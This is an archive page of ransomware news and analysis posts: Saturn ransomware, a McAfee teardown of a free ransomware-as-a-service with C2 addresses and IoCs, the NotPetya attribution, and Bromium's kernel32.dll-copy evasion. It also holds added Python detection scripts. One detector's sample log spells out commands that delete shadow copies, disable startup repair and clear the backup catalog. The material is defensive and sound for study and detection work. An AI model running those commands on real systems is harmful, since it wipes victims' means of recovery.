Category Archives: ransomware

Security Affairs: Researchers spotted a new malware in the wild, the Saturn Ransomware

Researchers at the MalwareHunterTeam spotted a new strain of ransomware called Saturn Ransomware, the name derives from the .saturn extension it appends to the name of the encrypted files.

Currently, the malware demands a payment of $300 USD from victims, an amount that doubles after 7 days.

Once it has infected a system, the Saturn Ransomware checks whether it is running in a virtual environment and, if so, halts execution to avoid being analyzed by researchers.

It then performs a series of actions to make it impossible for victims to restore the encrypted files: it deletes shadow volume copies, disables Windows startup repair, and clears the Windows backup catalog.

Below is the command executed by the malicious code:


At this point, the Saturn ransomware is ready to encrypt files of certain types.
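The three recovery-inhibition steps described above (shadow copy deletion, startup repair disabled, backup catalog cleared) are a useful detection signal on their own, because they normally appear together only during a ransomware run. The following checker is an added example, not code from the article or from Bleeping Computer: it runs regex rules over constructed process-creation log lines and escalates a host on which two or more of the documented actions fire. The `ts|host|parent|cmdline` log format and the sample lines are assumptions made for the example.

```python
"""Flag backup-inhibition commands in Windows process-creation logs.

Added example, not code from the original article. The Saturn write-up says the
malware deletes shadow volume copies, disables Windows startup repair and clears
the Windows backup catalog before encrypting; the command line itself is not
reproduced on the page, so the rules below cover the stock Windows utilities
that perform those actions. The log lines are constructed for this example.
"""
import re
from dataclasses import dataclass

# (label, pattern over the normalised command line). Each utility is a legitimate
# admin tool; several labels firing on one host in a short window is the signal.
RULES = [
    ("shadow_copy_deletion", re.compile(r"\bvssadmin(\.exe)?\b.*\bdelete shadows\b")),
    ("shadow_copy_deletion", re.compile(r"\bwmic(\.exe)?\b.*\bshadowcopy\b.*\bdelete\b")),
    ("startup_repair_disabled", re.compile(r"\bbcdedit(\.exe)?\b.*\brecoveryenabled no\b")),
    ("boot_failures_ignored", re.compile(r"\bbcdedit(\.exe)?\b.*\bbootstatuspolicy ignoreallfailures\b")),
    ("backup_catalog_cleared", re.compile(r"\bwbadmin(\.exe)?\b.*\bdelete catalog\b")),
]


@dataclass
class ProcEvent:
    ts: str        # event time
    host: str      # hostname the process ran on
    parent: str    # parent image name
    cmdline: str   # raw command line


def parse_line(line):
    """Parse one 'ts|host|parent|cmdline' record (constructed log format)."""
    ts, host, parent, cmdline = line.split("|", 3)
    return ProcEvent(ts, host, parent, cmdline)


def normalise(cmdline):
    """Lower-case and collapse whitespace so spacing tricks do not dodge the regexes."""
    return re.sub(r"\s+", " ", cmdline).strip().lower()


def classify(event):
    """Return the distinct rule labels matched by one process-creation event."""
    cmd = normalise(event.cmdline)
    hits = []
    for label, rx in RULES:
        if rx.search(cmd) and label not in hits:
            hits.append(label)
    return hits


def find_backup_inhibition(lines):
    """Group hits per host. Two or more distinct labels on one host is 'high'
    severity: that is the chain described for Saturn, not a lone admin command."""
    per_host = {}
    for line in lines:
        ev = parse_line(line)
        for label in classify(ev):
            per_host.setdefault(ev.host, {}).setdefault(label, []).append(ev.cmdline)
    return {
        host: {"severity": "high" if len(labels) >= 2 else "medium",
               "labels": sorted(labels)}
        for host, labels in per_host.items()
    }


# Constructed sample: WS01 shows the full chain, SRV02 a benign admin query, WS03 noise.
SAMPLE_LOG = [
    "2018-02-16T10:01:02|WS01|explorer.exe|C:\\Windows\\System32\\cmd.exe /c vssadmin delete shadows /all /quiet",
    "2018-02-16T10:01:03|WS01|cmd.exe|wmic   shadowcopy delete",
    "2018-02-16T10:01:04|WS01|cmd.exe|bcdedit /set {default} recoveryenabled No",
    "2018-02-16T10:01:04|WS01|cmd.exe|bcdedit /set {default} bootstatuspolicy ignoreallfailures",
    "2018-02-16T10:01:05|WS01|cmd.exe|wbadmin delete catalog -quiet",
    "2018-02-16T10:05:00|SRV02|cmd.exe|vssadmin list shadows",
    "2018-02-16T10:06:00|WS03|explorer.exe|C:\\Program Files\\Microsoft Office\\root\\Office16\\WINWORD.EXE /n",
]

if __name__ == "__main__":
    for host, alert in find_backup_inhibition(SAMPLE_LOG).items():
        print(host, alert["severity"], ", ".join(alert["labels"]))
```

On real telemetry (Sysmon Event ID 1 or Windows 4688 with command-line auditing enabled) the same rules apply; the per-host grouping is what separates a backup administrator's single `vssadmin` call from the sequence described here.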

Like many other threats, the ransomware uses a Tor payment site, whose address is reported in the ransom note dropped on the machine while the files are being encrypted.

“While encrypting the computer, Saturn Ransomware will drop ransom notes named #DECRYPT_MY_FILES#.html and #DECRYPT_MY_FILES#.txt and a key file named #KEY-[id].KEY in each folder in which it encrypts a file. The key file is used to login to the TOR ransom site, while the ransom note contains brief information on what has happened to the victims’ files and a link to the TOR payment site at su34pwhpcafeiztt.onion.” wrote Lawrence Abrams from Bleeping Computer.

[Image: file encrypted by the Saturn Ransomware (source: Bleeping Computer)]

The Saturn ransomware also drops a #DECRYPT_MY_FILES#.vbs file that plays an audio message to the victim, and it sets the Windows desktop background to #DECRYPT_MY_FILES.BMP.

Authentication to the TOR site is performed by uploading the key file; the victim is then shown the Saturn Decryptor page, which includes detailed instructions.

Researchers are still analyzing the Saturn ransomware. Although it is being actively distributed, it is still unclear which distribution vector the threat actors are using to spread it.

Further information, including indicators of compromise (IoCs), is available in the blog post published by Bleeping Computer.

Pierluigi Paganini

(Security Affairs – Saturn, cybercrime)

The post Researchers spotted a new malware in the wild, the Saturn Ransomware appeared first on Security Affairs.


Free Ransomware Available on Dark Web

The McAfee Advanced Threat Research team recently analyzed a ransomware-as-a-service threat that is available for free and without registration. This malware was first seen in July 2017 with the extension .shifr. It has now appeared in recent detections with the extension .cypher.

Ransomware-as-a-Service

Ransomware-as-a-service is a cybercrime economic model that allows malware developers to earn money for their creations without the need to distribute their threats. Nontechnical criminals buy their wares and launch the infections, while paying the developers a percentage of their take. The developers run relatively few risks, and their customers do most of the work.

Some ransomware-as-a-service, such as RaaSberry, use subscriptions while others require registration to gain access to the ransomware. The ransomware developer hosts a service on the “dark web” that allows any buyer to create and modify the malware. For example, the buyer can add custom ransom notes and the amount of the payment. More advanced services offer features such as evasion techniques to avoid detection and analysis. The service can also offer a control server with an administration panel to manage each victim. This system is convenient for both the developer, who makes money by selling malware, and for buyers, who gain ready-to-deploy ransomware without needing any specific coding knowledge.

The underground economy behind this service is well organized, effectively offering a cybercrime infrastructure. Basically, the ransomware is available on a website. The buyer sets up the ransomware by adding a wallet address. The ransomware is then available to download. The buyer just needs to customize and spread the malware. When a victim pays the ransom, a percentage is delivered both to the buyer and to the malware coder.


The ransomware is available on the TOR network at hxxp://kdvm5fd6tn6jsbwh.onion. A web page guides buyers through the configuration process.

On the configuration page, a generic XMPP address suggests we may have found a demo version of the ransomware.

On the page, the buyer need only add a Bitcoin wallet address and the amount of the ransom. Once that is done, the malware is generated and can be downloaded. With this malware, the developer earns a 10% commission on every payment. Now let’s look at the malware sample.

Dynamic Analysis 

When the malware launches on the victim’s system, it checks for an Internet connection. If there is none, it exits the process. Otherwise, it contacts the following addresses to download the encryption key:

Once the file is running, it creates several files on the system:

  • Encryption_key: the RSA key encrypted in AES
  • Lock_file: an indicator that the system is encrypted
  • Uuid_file: a reference for the infected machine. A TOR address is generated with this ID.

The encryption key is downloaded from hxxps://kdvm5fd6tn6jsbwh.onion.to/new_c/xmKksHw53W433lmvNsdzGxqWLcPLA44Dyna.

The ransom note is created on the desktop.

The file “HOW_TO_DECRYPT_FILES.html” gives a link to the TOR network.

Once the files are encrypted, the ransom note is displayed in HTML and points to the TOR site hxxp://kdvm5fd6tn6jsbwh.onion/ with the ID of the infected machine.

Allegedly after payment, the victim can download the file decrypter.exe and unlock encrypted files, which have the extension .cypher.

The malware encrypts the following file extensions:

The targeted extensions include many picture and photography files related to Canon, Kodak, Sony, and others. There are also extensions for AutoCAD, Autodesk projects, scalable vector images, and Microsoft Office files. These files are mostly used by designers, photographers, architects, and many others.

Digging Deeper

The malware runs on 64-bit systems and is coded in Golang (“Go language,” from Google), a programming language similar to C with some improvements in error management. It is not common to find malware using Golang, although this is not the first time that we have analyzed such malware. This threat is pretty big compared with most other malware, larger than 5.5MB. The file size can make analysis more difficult and can also help evade hardcoded antimalware file-inspection sizes.

Reverse engineering a Golang binary is a bit different from other languages. Golang binaries are usually bigger than other executables. (By default, the compiler statically links the program’s libraries, resulting in a bigger file.)

A drawback for attackers is that such big binaries can be easily detected on a corporate network. Large files are “noisier” and may appear suspicious when arriving from an external source. They can also be less convenient for attackers to deal with because they can make the infection process more difficult.

The first interesting function to analyze in a Golang binary is the “main_main.” The malware starts by gathering environment variables. It then checks whether the file “lock_file” exists in the directory C:\Users\<username>\AppData\Roaming.

The function “main_Exists” will check for the file. If it does not exist, the malware exits the process.

If the file does exist, the malware downloads the public key from the control server.

The malware contacts the address  hxxps://kdvm5fd6tn6jsbwh.onion/new_c/<nameofmalware>. The encryption public key is stored directly on the website.

This address is generated when the buyer creates the ransomware on the developer’s web page; thus the same malware encrypts files with the same public key.

The malware generates the AES key and tries to find any network share by querying the drive letters.

This function tries to find network shares:

Before a file is encrypted, the malware creates another file in C:\Users\<username>\AppData\Roaming\uuid_file to use as a victim identifier.

The malware encrypts the files using AES and deletes them after encryption with the function “os.remove” to avoid any simple forensic recovery.

The decrypter, which can be downloaded, works in a similar way but it requests the private key that the victims must pay for at hxxps://kdvm5fd6tn6jsbwh.onion.to/get_privkey/math/big. The mechanism behind the encryption routine seems to be on the online server and the decryption key cannot be easily recovered.

The following information describes the decrypter.

Conclusion

Cybercrime-as-a-service is not new, yet it is now more widespread than ever. In this case, the malware is available for free but the ransomware developer earns a 10% fee from each victim who pays a ransom. The use of Golang is not common for malware. Most ransomware-as-a-service is not free, which could indicate this might be a demonstration version, or a proof of concept for future sale.

This malware is not advanced and was coded without evasion techniques, such as DGA, SSL for control, encryption, or even file compression. Looking at the targeted file extensions suggests the victims can range from general home or business users to the graphics industry. Although such malware is not difficult to analyze, it can be very destructive in a corporate environment.

Keep in mind that paying a ransom is no guarantee of receiving a decryption key. McAfee advises that you never pay a ransom. You can find further information and help on unlocking some ransomware threats at https://www.nomoreransom.org.

McAfee detects this threat as Ransomware-FPDS!0F8CCEE515B8.


Indicators of Compromise

Hashes:

  • cb73927aa749f88134ab7874b15df898c014a35d519469f59b1c85d32fa69357
  • 0622fcb172773d8939b451c43902095b0f91877ae05e562c60d0ca0c237a2e9c

IP address:

  • hxxp://kdvm5fd6tn6jsbwh.onion

Files created:

  • C:\Users\<username>\AppData\Roaming\uuid_file
  • C:\Users\<username>\AppData\Roaming\lock_file
  • C:\Users\<username>\AppData\Roaming\encryption_key
  • C:\Users\<username>\Desktop\HOW_TO_DECRYPT_FILES.html

Encryption extension:

  • .cypher

References:

https://www.virustotal.com/en/file/0622fcb172773d8939b451c43902095b0f91877ae05e562c60d0ca0c237a2e9c/analysis/

https://isc.sans.edu/forums/diary/Ransomware+as+a+Service/23277/

 

The post Free Ransomware Available on Dark Web appeared first on McAfee Blogs.

The State of Ransomware: Attacks Up, Payments Down as Firms Fight Back

Ransomware isn’t going away. As noted by Infosecurity Magazine, European small and midsize businesses (SMBs) paid out almost $100 million last year to recover encrypted files. Meanwhile, Malwarebytes tracked a 90 percent increase in the number of detected ransomware attacks.

But it’s not all bad news. According to a new report from Datto, the state of ransomware is shifting. More companies are reporting attacks and fewer are paying ransoms. It’s a standoff: Ransomware-makers are doubling down on new attacks even as enterprises push back on payment.

The Current State of Ransomware

The Datto report pointed out that 4.5 percent of European SMBs fell victim to malware between 2016 and 2017. More telling, 78 percent said they experienced “business-threatening downtime” because of these attacks. Meanwhile, 97 percent of respondents said that ransomware attacks were on the rise, with 22 percent reporting multiple attacks in a single day.

What’s more, attackers are both persistent and pernicious. Eleven percent of SMBs said persistent ransomware was used to attack systems more than once, while 31 percent reported that ransomware also infected backups, making the road to remediation much more difficult. Given these startling numbers, it’s easy to see why the current state of ransomware has companies concerned.

Breaking the Feedback Loop of Fear

The ramp-up of ransomware threats has created a kind of feedback-loop culture. Companies know that they shouldn’t pay the ransom and should report the attack, but standard operating procedure has become the opposite: Pay quickly to decrypt files and keep the breach under wraps.

As noted by the Datto report, however, attitudes are changing. More businesses are now reporting attacks to authorities and supplying them with relevant data, while just 21 percent of SMBs opted to pay the ransom in 2017. That’s a solid choice, since 18 percent of firms that came up with the cash didn’t get their data back.

So what’s the best way to push back and put enterprises ahead of malware-makers? It starts with recognizing origin points. According to Tech Republic, the root causes of most successful ransomware infections are user error and phishing attacks. Basic security hygiene, solid antivirus solutions and robust security training go a long way toward taking the bite out of ransomware threats.

Meanwhile, security firms are actively researching ransomware decryption tools, ZDNet reported. The Belgian National Police and Kaspersky Lab recently released a free solution for the prolific Cryakl ransomware strain.

The biggest shift, however, comes at a corporate level. Given the ability of ransomware threats to infect any operating system and any platform at any time, organizations often take on the mantle of helpless victim inevitably compromised by bad actors.

As a result, the threat of ransomware becomes just as terrifying as the infection itself, forcing employees and IT professionals into an infinite loop of fear and frustration. With the rise of reporting, proven effectiveness of basic security training and ongoing work by security experts, however, the state of ransomware becomes a driving force for security adaptation rather than harbinger of IT apocalypse.

The post The State of Ransomware: Attacks Up, Payments Down as Firms Fight Back appeared first on Security Intelligence.

Why the cyber threat landscape could grow under GDPR

The General Data Protection Regulation (GDPR) is only 3 short months away, with the incoming regulation seeing businesses across Europe and beyond bolster their cyber security in an effort to

The post Why the cyber threat landscape could grow under GDPR appeared first on The Cyber Security Place.

What the UK Knows: Five Things That Link NotPetya to Russia

The UK’s Foreign Office Minister Lord Ahmad said that the UK Government believes Russia was responsible for the destructive NotPetya cyber-attack of June 2017. How can they be sure? We look at five strong clues pointing back to the Kremlin. The government of the United Kingdom has formally attributed the June 2017 NotPetya wiper attacks to...


UK Foreign Office Minister blames Russia for NotPetya massive ransomware attack

The United Kingdom’s Foreign and Commonwealth Office formally accuses the Russian cyber army of launching the massive NotPetya ransomware attack.

The UK Government formally accuses the Russian cyber army of launching the massive NotPetya ransomware attack.

The United Kingdom’s Foreign and Commonwealth Office “attributed the NotPetya cyber-attack to the Russian Government.”

According to the UK, NotPetya was used to disrupt Ukrainian “financial, energy and government sector” targets, but it went out of control, causing severe damage to companies worldwide.


Maersk chairman Jim Hagemann Snabe revealed that the shipping giant reinstalled 45,000 PCs and 4,000 servers after the NotPetya attack.

In August 2017 the company announced that it would incur hundreds of millions of U.S. dollars in losses due to the massive ransomware attack.

The UK considers the attack an intolerable act and will not accept similar offensives in the future.

“Foreign Office Minister Lord Ahmad has today attributed the NotPetya cyber-attack to the Russian Government. The decision to publicly attribute this incident underlines the fact that the UK and its allies will not tolerate malicious cyber activity.” reads the official statement issued by the UK Government.

“The attack masqueraded as a criminal enterprise but its purpose was principally to disrupt. Primary targets were Ukrainian financial, energy and government sectors. Its indiscriminate design caused it to spread further, affecting other European and Russian business.”

Below is the declaration of the Foreign Office Minister for Cyber Security, Lord (Tariq) Ahmad of Wimbledon:

“The UK Government judges that the Russian Government, specifically the Russian military, was responsible for the destructive NotPetya cyber-attack of June 2017.

The attack showed a continued disregard for Ukrainian sovereignty. Its reckless release disrupted organisations across Europe costing hundreds of millions of pounds.

The Kremlin has positioned Russia in direct opposition to the West yet it doesn’t have to be that way. We call upon Russia to be the responsible member of the international community it claims to be rather than secretly trying to undermine it.

The United Kingdom is identifying, pursuing and responding to malicious cyber activity regardless of where it originates, imposing costs on those who would seek to do us harm. We are committed to strengthening coordinated international efforts to uphold a free, open, peaceful and secure cyberspace.”

According to Ukraine’s Security Service (SBU), Russia orchestrated the NotPetya ransomware attack; the agency went public with its accusations just days after the incident.

NotPetya wasn’t the last massive ransomware attack: it was followed in late October by the Bad Rabbit ransomware, which infected systems in many countries worldwide, most of them in Eastern Europe, including Ukraine and Russia.

Pierluigi Paganini

(Security Affairs – NotPetya, ransomware)

The post UK Foreign Office Minister blames Russia for NotPetya massive ransomware attack appeared first on Security Affairs.




Security Affairs

NotPetya/GoldenEye back in the spotlight: UK officially points finger to Kremlin for June 2017 cyberattack

2017 has already gone down as the worst year on record from a cybersecurity standpoint. But the world is still not over the two infamous attacks deployed by hackers in May (WannaCry) and June (NotPetya/Goldeneye) of last year, which together dealt billions of dollars’ worth of damages to victims worldwide.

After conducting scrupulous assessments in the wake of June’s NotPetya/GoldenEye pandemic, the UK’s cybersecurity watchdog claims it knows Russia was behind it. And it wants Russia to know it is not having it anymore.

A letter signed by the Foreign & Commonwealth Office, National Cyber Security Centre, and Lord Ahmad of Wimbledon reads:

“The UK’s National Cyber Security Centre assesses that the Russian military was almost certainly responsible for the destructive NotPetya cyber-attack of June 2017. Given this is the highest level of assessment and the broader context, the UK government has made the judgement that the Russian government was responsible for this cyber-attack.”

“The attack masqueraded as a criminal enterprise but its purpose was principally to disrupt. Primary targets were Ukrainian financial, energy and government sectors. Its indiscriminate design caused it to spread further, affecting other European and Russian business.”

Ahmad said the UK Government “judges” that the malware was crafted and subsequently deployed by none other than the Russian military, adding that “The attack showed a continued disregard for Ukrainian sovereignty. Its reckless release disrupted organisations across Europe costing hundreds of millions of pounds” – a figure already circulated by the media after victims released financial statements mentioning the losses incurred by the attack.

As avid readers might remember, NotPetya/ GoldenEye’s total financial damage was ultimately calculated at over 1 billion US Dollars.

“The Kremlin has positioned Russia in direct opposition to the West yet it doesn’t have to be that way,” Ahmad continues his denunciatory message. “… The United Kingdom is identifying, pursuing and responding to malicious cyber activity regardless of where it originates, imposing costs on those who would seek to do us harm.”

Most cybersecurity experts agree that NotPetya/GoldenEye was merely crafted to work like ransomware but was instead primarily aimed at destabilizing Ukraine – not necessarily to turn a profit for the attackers.

After hitting Ukraine, the malware spread to several other European countries (including the UK), disrupting international power distributors, pharmaceutical companies, banks, advertisers, law firms, public transport, even airports.

This is not the first time the UK has warned that it will respond in kind when faced with such activity. Eight months ago, the country’s defense secretary Sir Michael Fallon threatened to deploy “air, land, sea or cyber space” attacks against hackers caught infiltrating British government systems.

WeLiveSecurity: Android ransomware in 2017: Innovative infiltration and rougher extortion

Ransomware in 2017 saw users and businesses across the globe trying to cope with campaigns such as Petya and WannaCryptor. Not to be outdone, Android ransomware had a year full of innovative infiltration and rougher extortion as highlighted by the latest ESET research whitepaper.

The post Android ransomware in 2017: Innovative infiltration and rougher extortion appeared first on WeLiveSecurity


Poor patching, user education leave healthcare providers sitting ducks for cyber attacks

Despite the masses of highly sensitive data that healthcare companies manage, new analysis has warned that chronically poor endpoint security, weak patching practices and high exposure to social engineering make

The post Poor patching, user education leave healthcare providers sitting ducks for cyber attacks appeared first on The Cyber Security Place.

What online attacks will dominate the threat landscape this year?

This article will focus on three different and pressing issues that the IT security industry needs to be prepared for during 2018 – the increase of cyber threats via social

The post What online attacks will dominate the threat landscape this year? appeared first on The Cyber Security Place.

The State of Security: Ransomware – A Reminder for Healthcare Providers to Lock Down Their Environments

Ransomware attacks against healthcare providers aren’t new. In 2017, two crypto-malware infections affecting medical organizations made The State of Security’s top list of ransomware attacks for the year. The first involved an unknown strain that targeted Arkansas Oral & Facial Surgery Center, an incident which affected X-ray images, documents, and patient data related to recent […]… Read More

The post Ransomware – A Reminder for Healthcare Providers to Lock Down Their Environments appeared first on The State of Security.


Bromium: Hackers Keep it Simple: Malware Evades Detection by Simply Copying a File

  • New malware technique evades detection by simply copying a file
  • We break it down step-by-step to show you how it works
  • Innovative hackers continue to deliver sophisticated malware that evades detection

The Bromium Lab is back to break down a recent outbreak of sneaky malware, shared with us by some of our customers who caught this in their isolated micro-VMs.

For decades, malware has tried to avoid detection in ever more cunning ways:

  • First, files became polymorphic so that simply checking files on disk wouldn’t work.
  • Then malware behavior became polymorphic too so that detection tools would struggle to spot the malware’s activity in the noise and chaos of typical PC operations.

Still, behavior analysis remains the main strategy for the detection-based security industry.


Now, we are seeing a depressingly simple, obvious way to avoid this sort of detection: copy a file. To fully understand this latest approach, let me provide a quick primer on how detection-based security products work. If you’re already an expert, feel free to scroll down.

+++

In the normal operation of a PC, applications (such as Word) constantly make requests to the operating system (OS), and more specifically to the OS “kernel”—the most powerful part of the operating system.

Common requests would be:

  • Open that file
  • Display this picture on the screen
  • Play that sound
  • Etc, etc, all day long


Any malware in a Word application will likely need to ask the kernel to do its evil bidding.


So, the detection industry monitors all these requests from applications (like Word) into the kernel. They hope to spot a pattern of suspicious requests and alert you to malicious activity.

One way to detect suspicious activity is to intercept these requests as they pass through “kernel32.dll.” That’s a standard part of the Windows OS that allows normal applications (“user-space code”) to make requests into the kernel (“kernel-space”). Like this:


Detection products aim to separate the wheat from the chaff and spot the pattern of odd behavior that would imply that something dubious is running within Word. Unfortunately for detection-based security, it’s mathematically impossible to do that with 100% correctness (deciding in general what arbitrary code will do runs into the halting problem), but that’s another story.

+++

Returning to this particular flavor of malware, we see a rather simple, cunning way to bypass the detection products: It simply copies kernel32.dll.


The copied version is byte-for-byte identical, so it relays requests from Word into the kernel in precisely the same way as the original, and it passes any hash- or signature-based check. Only the file name is subtly different. Products that set their hooks inside the kernel32.dll image already mapped into the process never see calls that go through the fresh copy, so some of them fail to detect the malware activity as it passes from Word to the kernel. The trick has limits worth knowing: the copy’s own imports still resolve to the ntdll.dll (and, on current Windows, kernelbase.dll) already loaded in the process, so hooks placed there, kernel-mode callbacks, and image-load telemetry (the copy shows up as kernel32.dll’s version resource and hash appearing under a different path) all still catch it.
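
Because the copy is identical, the cheapest place to catch it is in image-load telemetry rather than in API hooks. The following is an added example, not Bromium’s code: it runs over Sysmon “Image loaded” (Event ID 7) records and flags any load that is really kernel32.dll but does not come from the system directory under its own name, using the OriginalFileName field (present in Sysmon 10 and later, read from the DLL’s version resource) and, as a fallback for copies with that resource stripped, the file hash compared against the hash of the real kernel32.dll seen loading from System32 or SysWOW64 earlier in the same log. The records below are constructed for illustration, flattened to “Field: value” pairs, and the hashes are placeholders.

```python
"""Spot a renamed copy of kernel32.dll being mapped into a process.

Added example for this page, not Bromium's code. Input is a list of Sysmon
Event ID 7 records flattened to "Field: value|Field: value" text; the
sample records and their hashes are constructed.
"""
import ntpath
import re

SYSTEM_DIRS = {r"c:\windows\system32", r"c:\windows\syswow64"}

SAMPLE_EVENTS = [
    # Normal: Word maps the real kernel32.dll from System32.
    "Image: C:\\Program Files\\Microsoft Office\\root\\Office16\\WINWORD.EXE"
    "|ImageLoaded: C:\\Windows\\System32\\kernel32.dll"
    "|Hashes: SHA256=AAAA1111|OriginalFileName: kernel32",
    # Normal: an unrelated system DLL.
    "Image: C:\\Program Files\\Microsoft Office\\root\\Office16\\WINWORD.EXE"
    "|ImageLoaded: C:\\Windows\\System32\\ntdll.dll"
    "|Hashes: SHA256=BBBB2222|OriginalFileName: ntdll.dll",
    # Suspicious: identical copy of kernel32.dll under a new name in %TEMP%.
    "Image: C:\\Program Files\\Microsoft Office\\root\\Office16\\WINWORD.EXE"
    "|ImageLoaded: C:\\Users\\alice\\AppData\\Local\\Temp\\kernel32_.dll"
    "|Hashes: SHA256=AAAA1111|OriginalFileName: kernel32",
    # Suspicious: copy with its version resource stripped; only the hash gives it away.
    "Image: C:\\Users\\alice\\AppData\\Local\\Temp\\invoice.exe"
    "|ImageLoaded: C:\\Users\\alice\\AppData\\Local\\Temp\\k32.dll"
    "|Hashes: SHA256=AAAA1111|OriginalFileName: -",
]


def parse_event(line):
    """Turn 'Field: value|Field: value' into a dict."""
    fields = {}
    for part in line.split("|"):
        key, _, value = part.partition(": ")
        fields[key.strip()] = value.strip()
    return fields


def split_path(path):
    """Return (lower-cased directory without trailing backslash, lower-cased file name)."""
    directory, name = ntpath.split(path)
    return directory.lower().rstrip("\\"), name.lower()


def original_name(event):
    """Normalise OriginalFileName: Windows builds report 'kernel32' or 'kernel32.dll'."""
    return re.sub(r"\.dll$", "", event.get("OriginalFileName", "").lower())


def sha256_of(event):
    match = re.search(r"SHA256=([0-9A-Fa-f]+)", event.get("Hashes", ""))
    return match.group(1).upper() if match else None


def find_kernel32_copies(lines):
    """Return [(image_path, reason)] for every load that looks like a renamed kernel32.dll."""
    events = [parse_event(line) for line in lines]

    # Pass 1: hashes of kernel32.dll loaded from where it belongs form the baseline.
    baseline = set()
    for ev in events:
        directory, name = split_path(ev.get("ImageLoaded", ""))
        if name == "kernel32.dll" and directory in SYSTEM_DIRS and sha256_of(ev):
            baseline.add(sha256_of(ev))

    # Pass 2: anything else that is kernel32 by version resource or by hash is a copy.
    alerts = []
    for ev in events:
        loaded = ev.get("ImageLoaded", "")
        directory, name = split_path(loaded)
        if name == "kernel32.dll" and directory in SYSTEM_DIRS:
            continue
        if original_name(ev) == "kernel32":
            alerts.append((loaded, "version resource says kernel32 but path/name differ"))
        elif sha256_of(ev) in baseline:
            alerts.append((loaded, "hash matches the system kernel32.dll"))
    return alerts


if __name__ == "__main__":
    for path, reason in find_kernel32_copies(SAMPLE_EVENTS):
        print(f"ALERT {path}: {reason}")
```

The two-pass design matters: building the hash baseline from loads that come from the system directory means the rule keeps working after Windows Update changes kernel32.dll, and it still fires on a copy whose version resource has been wiped, which the name-only check would miss. To run it on real data, export Sysmon Event ID 7 records with the ImageLoaded, Hashes and OriginalFileName fields into the same flat form.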

Once it can talk to the kernel, the malware can launch new processes to begin its reign of terror:

  • Does some process hollowing of “svchost.exe”
  • Installs Tor so it can create anonymous connections via the “dark web” to its command-and-control server
  • Sits and listens, awaiting instructions from its masters to encrypt your documents, steal your secrets, spy on your staff, or whatever else its commanders want it to do.


Detection-based security is flawed.

There are always new ways for malware authors to outsmart detection tools. In this example, Bromium’s detection engine identified the malware, but that’s not always the case. Bromium doesn’t claim to detect everything; nobody can. For the customers who shared this data with us, the malware played out exactly as its authors intended … but it did so in an isolated micro-VM, and it was unable to harm or impact the host or the network.

On behalf of the Bromium Lab team, we look forward to capturing the next installment of malware in our micro-VMs, and, of course, sharing the details with you.

 


The post Hackers Keep it Simple: Malware Evades Detection by Simply Copying a File appeared first on Bromium.





Bromium

The AVIEN Blog: Rapid ransomware spoofs IRS

Bleeping Computer, 12th February 2018: Rapid Ransomware Being Spread Using Fake IRS Malspam

“A new variant of Rapid Ransomware is currently being distributed using malspam that pretends to be from the Internal Revenue Service. First detected by Derek Knight, this campaign is a mixup of countries with the IRS being a U.S. entity, the sender being a UK email address, and the spam attachment being in German.”

Much more information in Lawrence Abrams’ article.

David Harley



The AVIEN Blog

Ransomware costs European SMBs £71 million in downtime

Some businesses still decide to pay the ransom as they see it as a cheap way out. Ransomware costs European businesses £71 million in downtime, a new report by Datto argues.

The post Ransomware costs European SMBs £71 million in downtime appeared first on The Cyber Security Place.

Victims of the current version of the Cryakl ransomware can decrypt their files for free

Free decryption keys for the Cryakl ransomware have been added to the free Rakhni Decryptor, which can be downloaded from the NoMoreRansom website.

The Belgian Federal Police located the command and control server used by the criminal organization behind the Cryakl ransomware. The server was in an unspecified neighboring country; law enforcement seized it and shared the decryption keys found on the machine with the No More Ransom project.

“The Belgian Federal Police is releasing free decryption keys for the Cryakl ransomware today, after working in close cooperation with Kaspersky Lab. The keys were obtained during an ongoing investigation; by sharing the keys with No More Ransom the Belgian Federal Police becomes a new associated partner of the project – the second law enforcement agency after the Dutch National Police.” reads the statement published by the Europol.

“Led by the federal prosecutor’s office, the Belgian authorities seized this and other servers while forensic analysis worked to retrieve the decryption keys. Kaspersky Lab provided technical expertise to the Belgian federal prosecutor and has now added these keys to the No More Ransom portal on behalf of the Belgian federal police. This will allow victims to regain access to their encrypted files without having to pay to the criminals.”

The “exponential” rise of the ransomware threat is a serious problem for users online and a profitable business for cyber criminals. The No More Ransom operation is Europol’s response to the growing threat.

Cryakl ransomware

Victims of Cryakl ransomware can recover encrypted files using the Rakhni Decryptor, available for free from Kaspersky Lab or the NoMoreRansom website.

The tool works with most versions of the Cryakl ransomware, but researchers at MalwareHunterTeam confirmed that it doesn’t work with versions newer than CL 1.4.0.

It has been estimated that the tool has helped more than 35,000 victims of ransomware to decrypt their files for free, an overall loss for crooks of over €10m.

“There are now 52 free decryption tools on www.nomoreransom.org, which can be used to decrypt 84 ransomware families. CryptXXX, CrySIS and Dharma are the most detected infections.” continues the statement.

The Belgian authorities are still investigating the case.

 

Pierluigi Paganini

(Security Affairs – Cryakl ransomware, cybercrime)

The post Victims of the current version of the Cryakl ransomware can decrypt their files for free appeared first on Security Affairs.

E Hacking News – Latest Hacker News and IT Security News: Advancing Ransomware Attacks and Creation of New Cyber Security Strategies

As ransomware rises, organisations focus too much on anti-virus software and not enough on proactive strategies for dealing with attacks that pose an ongoing threat to their users. One good piece of advice is to create air gaps: they make it far easier to store and protect critical data, including keeping a copy offline. When a ransomware attack occurs, it should then be possible to restore data with little downtime, if any.

Yet organisations more often than not find themselves taking one step forward and one step back. Ransomware has traditionally gone after backup programs and their associated storage, and it is now just as keen on the storage subsystems themselves, which has spurred organisations into putting robust backup procedures in place so that an attack which gets through can still be countered.

To be proactive, organisations should look at different ways of protecting data so that it can be readily recovered whenever a ransomware attack, or some other security incident, threatens to disrupt day-to-day business operations.

Clive Longbottom, client services director at analyst firm Quocirca explains: “If your backup software can see the back-up, so can the ransomware. Therefore, it is a waste of time arguing about on-site v off-site – it comes down to how well air locked the source and target data locations are.”

Defending against any cyber-attack takes several layers of defence, such as a firewall, anti-virus software and backups. The last layer, the one the user falls back on, must be the most robust of them all, so that it stops a potentially costly disruption in its tracks before it is too late. Anti-virus software therefore still plays a key defensive role.

A ransomware attack is pretty brutal, warns Longbottom: “It requires a lot of CPU and disk activity. It should be possible for a system to pick up this type of activity and either block it completely, throttle it, or prevent it from accessing any storage system other than ones that are directly connected physically to the system.”
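
Longbottom’s point that mass encryption is loud in CPU and disk terms is what behaviour-based ransomware detection builds on. The following is an added example, not code from the article or from Quocirca: a small monitor that scores a stream of file writes by the Shannon entropy of the data written and alerts when most writes inside a short sliding window look like ciphertext. It assumes a hypothetical feed of (timestamp, path, bytes written) events such as a minifilter or file-audit log would supply; the sample events are constructed, with deterministic pseudo-random bytes standing in for real ransomware output.

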